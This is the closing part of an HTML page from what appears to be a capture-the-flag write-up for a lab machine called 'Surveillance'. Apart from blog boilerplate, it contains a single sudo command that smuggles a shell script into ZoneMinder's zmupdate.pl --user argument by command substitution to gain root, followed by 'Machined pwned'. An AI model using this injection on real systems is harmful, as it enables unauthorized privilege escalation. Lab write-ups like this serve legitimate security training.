        <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo</span> /usr/bin/zmupdate.pl <span class="nt">--version</span><span class="o">=</span>1 <span class="nt">--user</span><span class="o">=</span><span class="s1">'$(/tmp/exploitfinalbello.sh)'</span> <span class="nt">--pass</span><span class="o">=</span>ZoneMinderPassword2023
</code></pre></div>        </div>
        <p><br /><br />
Machined pwned!@1
<script src="/assets/js/matrix-overlay.js"></script></p>
      </li>
    </ol>
  </li>
</ul>

<link rel="stylesheet" href="/assets/css/imagesstyle.css" />


</div>


<div class="comments">
<div id="disqus_thread"></div>
<script>
 var disqus_config = function () {
     this.page.url = 'https://your-site-url/writeups/2025/07/10/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf.html';
     this.page.identifier = '/writeups/2025/07/10/8207f765-d648-4dc3-ba83-0b44a11e6784-export-13ad4084-710c-4cfa-b826-02a6c065cecf';
     this.page.title = 'Surveillance-Linux-Medium';
 };

 (function() {  // REQUIRED CONFIGURATION VARIABLE: EDIT THE SHORTNAME BELOW
     var d = document, s = d.createElement('script');

     s.src = '//<your-disqus-shortname>.disqus.com/embed.js';

     s.setAttribute('data-timestamp', +new Date());
     (d.head || d.body).appendChild(s);
 })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>

</div>




<div class="related">
  <h2>related posts</h2>
  <ul class="related-posts">
    
      <li>
        <h3>
          <a href="/writeups/2025/08/09/dddc540b-b15a-4ca6-a4e5-f95074025ea8-export-c6a747d0-44c2-4f1a-b1f3-cc9f14194be4.html">
            University-Windows-Insane
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/writeups/2025/08/04/d2fd2792-68e0-4168-9904-f90f3bf63609-export-0ee8c1a5-de29-43f8-b0f4-339fa55d28de.html">
            Code-Linux-Easy
          </a>
        </h3>
      </li>
    
      <li>
        <h3>
          <a href="/writeups/2025/07/26/e76d8ea2-ffc7-429a-835f-9f3b0344d1ab-export-d6a1d454-c23f-4600-bcb8-77c5a1ed5947.html">
            Cypher-Linux-Medium
          </a>
        </h3>
      </li>
    
  </ul>
</div>






<script>
  let i = 0;
  const text = '';
  const speed = parseInt('50');
  
  function typeWriter() {
    if (i < text.length) {
      document.getElementById('animated-post-description').innerHTML += text.charAt(i);
      i++;
      setTimeout(typeWriter, speed);
    }
  }

  document.getElementById('animated-post-description').style.display = 'initial';
  typeWriter();

  // Image modal
  var $imgs = [];
  $('img').each(function(idx) {
    var obj = {
      src: $(this).attr('src')
    }
    $imgs.push(obj);
    var elem = $(this);
    $(this).click(function() {
      $('.modal').magnificPopup('open', idx);
    });
  });

  $('.modal').magnificPopup({
    items: $imgs,
    type: 'image',
    closeOnContentClick: true,
    mainClass: 'mfp-img-mobile',
    image: {
      verticalFit: true
    }
    
  });
</script>

      </div>
    </main><footer class="site-footer">
  <div class="wrapper">
    <div class="credits"><a href="https://github.com/bitbrain/jekyll-dash">dash</a> theme for Jekyll by <a href="https://github.com/bitbrain">bitbrain</a> made with <i class="fas fa-heart"></i><div class="toggleWrapper">
    <input type="checkbox" class="dn" id="theme-toggle" onclick="modeSwitcher()" checked />
    <label for="theme-toggle" class="toggle">
    <span class="toggle__handler">
      <span class="crater crater--1"></span>
      <span class="crater crater--2"></span>
      <span class="crater crater--3"></span>
    </span>
        <span class="star star--1"></span>
        <span class="star star--2"></span>
        <span class="star star--3"></span>
        <span class="star star--4"></span>
        <span class="star star--5"></span>
        <span class="star star--6"></span>
    </label>
</div>
<script type="text/javascript">
const theme = localStorage.getItem('theme');

if (theme === "light") {
    document.documentElement.setAttribute('data-theme', 'light');
} else {
    document.documentElement.setAttribute('data-theme', 'dark');
}
const userPrefers = getComputedStyle(document.documentElement).getPropertyValue('content');

function activateDarkTheme() {
    document.getElementById('theme-toggle').checked = true;
    document.documentElement.setAttribute('data-theme', 'dark');
    document.documentElement.classList.add('theme--dark');
    document.documentElement.classList.remove('theme--light');
	document.getElementById("theme-toggle").className = 'light';
	window.localStorage.setItem('theme', 'dark');
}

function activateLightTheme() {
    document.getElementById('theme-toggle').checked = false;
    document.documentElement.setAttribute('data-theme', 'light');
    document.documentElement.classList.add('theme--light');
    document.documentElement.classList.remove('theme--dark');
	document.getElementById("theme-toggle").className = 'dark';
	window.localStorage.setItem('theme', 'light');
}

if (theme === "dark") {
    activateDarkTheme();
} else if (theme === "light") {
    activateLightTheme();
} else if  (userPrefers === "light") {
    activateDarkTheme();
} else {
    activateDarkTheme();
}

function modeSwitcher() {
	let currentMode = document.documentElement.getAttribute('data-theme');
	if (currentMode === "dark") {
	    activateLightTheme();
	} else {
	    activateDarkTheme();
	}
}
</script></div>
  </div>
</footer>


<script>
      window.FontAwesomeConfig = {
        searchPseudoElements: true
      }
    </script>
  </body>

</html>
